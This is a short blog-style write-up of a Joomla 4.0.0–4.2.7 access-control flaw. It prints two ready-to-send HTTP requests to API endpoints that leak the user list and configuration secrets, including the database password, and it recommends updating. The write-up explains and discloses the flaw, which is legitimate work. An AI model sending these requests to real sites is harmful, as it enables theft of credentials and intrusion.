In today’s article we’re going to look at a vulnerability in a content management system (CMS) called Joomla. The flaw allows an unauthenticated attacker to list all the users in the application and collect system configuration information, such as username and database password.
Description
The flaw consists of poor validation of access to the endpoints responsible for listing user and database information, being classified as a medium vulnerability by NIST (CVSS 3.x), however, in the security advisory issued by Joomla, they define this vulnerability as a potential critical impact.
Affected versions
The versions affected by the vulnerability are: 4.0.0 <= 4.2.7.
Exploiting vulnerabilities
The exploitation of the vulnerability consists of two endpoints, the first being used to collect existing users in the application, while the other consists of system configuration information (database), below are the requests to the affected endpoints and their responses.
- Collect user information:
GET /api/index.php/v1/users?public=true HTTP/1.1
Host: {{HOST}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Collect configuration information:
GET /api/index.php/v1/config/application?public=true HTTP/1.1
Host: {{HOST}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Note that it was possible to collect sensitive information and passwords in plain text.
Obs: the first endpoint in question brings up all existing users, in my lab I only had the administrator registered.
How to fix
Update the software to the latest version.